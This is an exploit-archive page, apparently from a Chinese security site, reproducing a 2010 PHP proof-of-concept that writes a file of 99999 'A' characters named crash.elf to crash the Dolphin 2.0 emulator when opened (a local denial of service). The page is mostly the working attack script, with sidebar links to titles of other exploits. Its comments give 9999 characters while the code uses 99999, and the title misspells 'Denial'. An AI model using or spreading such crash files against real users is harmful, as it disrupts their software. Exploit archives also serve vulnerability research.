首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Dolphin 2.0 (.elf) Local Daniel Of Service
来源:Pr0T3cT10n 作者:pr0t3ct10n@gmail.com 发布时间:2010-05-10  
<?php
# Dolphin 2.0 (.elf) Local Daniel Of Service
# Software Site: http://www.dolphin-emu.com/
# Software Download: http://www.dolphin-emu.com/downloads.php?cat_id=9&download_id=94
# Author: Pr0T3cT10n <pr0t3ct10n@gmail.com>
# Site: http://www.nullbyte.org.il
##################################################################
# Dolphin 2.0 is vulnerable to local denial of service attack.
# When we try to open a file by 'Open(CTRL+O)'
# that contains 9999 chars ('A'), so dolphin should crash.
##################################################################
# PoC / Code:
$buffer = str_repeat('A', 99999); # Create 9999 chars('A')..
if(file_put_contents('crash.elf', $buffer)) {
 echo("File created successfuly.\r\nDolphin should crash when you open the file with it.\r\n");
} else {
 echo("Can't create file. Try again.\r\n");
}
# Cya :)
# NULLBYTE.ORG.IL
####################
?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IDEAL Migration v4.5.1 Buffer
·Xitami / 5.0a0 Denial Of Servi
·GeoHttpServer Remote DoS Vulne
·Netvidade engine v1.0 Multiple
·AVCON H323Call Buffer Overflow
·Hyplay 1.2.0326.1 (.asx) Local
·ESET Smart Security 4.2 / NOD3
·WinXP SP2 Fr Download and Exec
·TFTPGUI v1.4.5 Long Transport
·Microsoft Windows Outlook Expr
·phpscripte24 Shop System SQL I
·Apple Safari 4.0.5 parent.clos
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved